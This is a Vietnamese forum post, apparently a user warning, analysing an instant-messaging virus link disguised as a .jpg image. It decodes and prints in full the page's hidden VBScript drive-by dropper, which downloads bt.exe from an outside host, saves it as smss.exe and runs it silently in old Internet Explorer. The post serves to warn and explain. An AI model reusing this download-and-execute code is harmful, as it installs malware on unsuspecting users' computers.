Virus IM càng ngày càng tinh vi hơn
Trang 1 trong tổng số 1 trang
Virus IM càng ngày càng tinh vi hơn
tôi nhận được 1 link ảnh như sau :
hxxp://my.http.vn/hinhvn/miss_thuy.jpg
View source thấy đoạn code sau :
>
if(frames)
{if(top.frames.length>0)
top.location.href=self.location;
}
language=Javascript>
document.write(unescape('%0D%0A%3C%........%2Fb%6Fdy%3E%0D%0A'))
thủ đoạn ở đây là đuôi file : .jpg --> ko ai nghi nghờ cả (Chỉ bị đối với
IE 5.x), cái này có vẻ giống Gaixinh.jpg
hơn nữa đoạn code đã được escape. Sau khi unescape nó sẽ như sau (đoạn được
escape):
on error resume next
dl =
"hxxp://my.http.vn/hinhvn/bt.exe"
Set df =
document.createElement("object")
df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x
=
df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set
S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl,
False
x.Send
fname1="smss.exe"
set F =
df.createobject("scripting.FileSystemObject","")
set tmp =
F.GetSpecialFolder(2) ' Get tmp folder
fname1=
F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile
fname1,2
S.close
set Q =
df.createobject("Shell.Application","")
Q.ShellExecute
fname1,"","","open",0
src="hinh.jpg">
border="0" alt="Free Web Counter" src="http://xyz.freeweblogger.com/counter/index.php?u=hanthien&s=7seg"
ALIGN="middle" HSPACE="4" VSPACE="2">
src=http://xyz.freeweblogger.com/counter/script.php?u=hanthien>
Code hoàn toàn giống các con virus cũ, file lây nhiễm
hxxp://my.http.vn/hinhvn/bt.exe chắc là cũng được viết bằng autoit (sẽ zem kỹ
sau-->sau khi xem thấy ko decomplie được, chưa biết thế nào).
Các bạn hãy cảnh giác ko bấm vào bất kỳ link nào send qua IM.
hxxp://my.http.vn/hinhvn/miss_thuy.jpg
View source thấy đoạn code sau :
if(frames)
{if(top.frames.length>0)
top.location.href=self.location;
}
document.write(unescape('%0D%0A%3C%........%2Fb%6Fdy%3E%0D%0A'))
thủ đoạn ở đây là đuôi file : .jpg --> ko ai nghi nghờ cả (Chỉ bị đối với
IE 5.x), cái này có vẻ giống Gaixinh.jpg
hơn nữa đoạn code đã được escape. Sau khi unescape nó sẽ như sau (đoạn được
escape):
on error resume next
dl =
"hxxp://my.http.vn/hinhvn/bt.exe"
Set df =
document.createElement("object")
df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x
=
df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set
S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl,
False
x.Send
fname1="smss.exe"
set F =
df.createobject("scripting.FileSystemObject","")
set tmp =
F.GetSpecialFolder(2) ' Get tmp folder
fname1=
F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile
fname1,2
S.close
set Q =
df.createobject("Shell.Application","")
Q.ShellExecute
fname1,"","","open",0
href="http://www.vuonmongmo.com">Next
ALIGN="middle" HSPACE="4" VSPACE="2">
Code hoàn toàn giống các con virus cũ, file lây nhiễm
hxxp://my.http.vn/hinhvn/bt.exe chắc là cũng được viết bằng autoit (sẽ zem kỹ
sau-->sau khi xem thấy ko decomplie được, chưa biết thế nào).
Các bạn hãy cảnh giác ko bấm vào bất kỳ link nào send qua IM.
Similar topics
» Người nhiễm virus máy tính!
» Virus máy tính – Phòng tránh và khắc phục
» Virus máy tính – Phòng tránh và khắc phục
» Quét virus trực tuyến bằng nhiều bộ máy anti-virus
» Lập trình virus trên C - viết virus khóa chuột
» Virus máy tính – Phòng tránh và khắc phục
» Virus máy tính – Phòng tránh và khắc phục
» Quét virus trực tuyến bằng nhiều bộ máy anti-virus
» Lập trình virus trên C - viết virus khóa chuột
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
27/8/2013, 11:45 am by echcondihoc
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
11/10/2011, 9:42 pm by CNTT_DH
» xin tai lieu tieng viet
31/8/2011, 6:59 am by bantoisg
» Theo dõi tiến trình
27/8/2011, 5:51 pm by haigaopro01
» Giải pháp Bảo mật của Cisco
17/6/2011, 8:50 am by admin
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
16/6/2011, 2:32 pm by admin
» Learn to hack !
16/6/2011, 8:49 am by admin
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
15/6/2011, 11:12 am by admin
» Ô Long Viên (Tập II)
27/9/2010, 4:56 pm by root
» những ebook về hack tiếng việt cho người mới tìm hiểu.
27/9/2010, 4:54 pm by root